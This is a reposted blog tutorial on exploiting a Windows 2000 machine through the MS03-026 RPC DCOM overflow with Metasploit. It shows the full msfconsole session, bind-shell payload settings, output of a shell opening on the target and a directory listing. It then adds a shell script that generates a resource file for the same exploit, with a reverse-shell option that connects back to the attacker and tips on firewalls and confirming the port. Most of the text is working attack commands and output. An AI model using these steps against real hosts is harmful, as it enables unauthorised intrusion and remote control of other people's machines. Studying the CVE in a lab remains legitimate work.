Exploiting Windows 2000 with msfconsole

1. Scan the Windows 2000 machine with Nessus. The scan reports several high-severity vulnerabilities,

for example: MS03-026 / MS03-039: Buffer Overrun In RPCSS Service Could Allow Code Execution (823980 / 824146)

Then open msfconsole and search for the bulletin number:

msf > search ms03-026

Matching Modules
================

   Name                                  Disclosure Date  Rank   Check  Description
   ----                                  ---------------  ----   -----  -----------
   exploit/windows/dcerpc/ms03_026_dcom  2003-07-16       great  No     MS03-026 Microsoft RPC DCOM Interface Overflow


msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(windows/dcerpc/ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(windows/dcerpc/ms03_026_dcom) > show payloads
msf exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 10.26.33.111
RHOST => 10.26.33.111
msf exploit(windows/dcerpc/ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.26.33.111     yes       The target address
   RPORT  135              yes       The target port (TCP)


Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.26.33.111     no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(windows/dcerpc/ms03_026_dcom) > run

[*] 10.26.33.111:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 10.26.33.111:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Sending exploit ...
[*] Started bind TCP handler against 10.26.33.111:4444
[*] Command shell session 1 opened (10.26.30.41:36675 -> 10.26.33.111:4444) at 2018-12-11 19:33:33 +0800



C:\WINNT\system32>d:    
d:

D:\>dir
dir
 Volume in drive D is ZRMPSEL_CN
 Volume Serial Number is EAB5-D65E

 Directory of D:\

2003-06-26  20:00                   45 AUTORUN.INF
2003-06-26  20:00       <DIR>          BOOTDISK
2003-06-26  20:00              304,624 BOOTFONT.BIN
2003-06-26  20:00                    0 CDROMSP4.TST
2003-06-26  20:00                    5 CDROM_IP.5
2003-06-26  20:00                    5 CDROM_NT.5
2003-06-26  20:00       <DIR>          DISCOVER
2003-06-26  20:00       <DIR>          I386
2003-06-26  20:00               12,354 READ1ST.TXT
2003-06-26  20:00              465,408 README.DOC
2003-06-26  20:00              358,160 SETUP.EXE
2003-06-26  20:00       <DIR>          SETUPTXT
2003-06-26  20:00               18,173 SPNOTES.HTM
2003-06-26  20:00       <DIR>          SUPPORT
2003-06-26  20:00       <DIR>          VALUEADD
               9 File(s)      1,158,774 bytes

               6 Dir(s)               0 bytes free
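The session above was typed by hand. The script below is an added example, not part of the original post, that turns the same steps into an msfconsole resource script so the attempt is reproducible and reviewable. It keeps the bind shell used above but also allows windows/shell_reverse_tcp, because a bind payload needs the target's port 4444 reachable from the attacker, which a host firewall often blocks, while a reverse payload only needs the attacker's listener reachable. The RHOST/LHOST values, the port and the output file name are placeholders; msfconsole is only needed for the final run step, not to generate the file.

```shell
#!/bin/sh
# Added example (not code from the original post): generate an msfconsole
# resource script for exploit/windows/dcerpc/ms03_026_dcom.
# Assumptions: the IPs and port are placeholders (the post's 10.26.33.111 and
# 10.26.30.41 are used in the usage line); msfconsole must be on PATH only to
# run the generated file.

# Return 0 if $1 is a dotted-quad IPv4 address with every octet in 0..255.
is_ipv4() {
  echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  old_ifs=$IFS; IFS=.
  set -- $1          # split the address into its four octets
  IFS=$old_ifs
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Print an msfconsole resource script to stdout.
#   $1 target IP   $2 payload (windows/shell_bind_tcp | windows/shell_reverse_tcp)
#   $3 port        $4 attacker IP (required for the reverse payload, else ignored)
ms03_026_rc() {
  rhost=$1; payload=$2; port=$3; lhost=$4
  is_ipv4 "$rhost" || { echo "bad RHOST: $rhost" >&2; return 1; }
  case "$payload" in
    windows/shell_bind_tcp)
      # Bind shell: msf connects TO the target on $port, so that port must be
      # reachable through any firewall in front of the target.
      extra="set LPORT $port" ;;
    windows/shell_reverse_tcp)
      # Reverse shell: the target connects BACK to us on $lhost:$port.
      is_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
      extra="set LHOST $lhost
set LPORT $port" ;;
    *)
      echo "unsupported payload: $payload" >&2; return 1 ;;
  esac
  cat <<EOF
use exploit/windows/dcerpc/ms03_026_dcom
set RHOST $rhost
set RPORT 135
set PAYLOAD $payload
$extra
# This module has no check method (see "Check: No" in search output), so the
# decision to fire rests on the scanner result; a failed attempt crashes RPCSS
# and can force the Windows 2000 target to reboot.
exploit -z
EOF
}

# Usage: sh ms03_026.sh 10.26.33.111 windows/shell_reverse_tcp 4444 10.26.30.41 > ms03_026.rc
#        msfconsole -q -r ms03_026.rc
if [ $# -ge 3 ]; then
  ms03_026_rc "$@"
fi
```

Before running the resource file, confirm that TCP/135 on the target is actually open and answers as Windows (for example with an nmap service scan), since the module cannot verify the target itself and a miss costs you the box until it comes back up. `exploit -z` returns to the prompt after the session opens; use `sessions -i 1` to interact as in the transcript above.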


Reposted from blog.csdn.net/weixin_41010318/article/details/84960413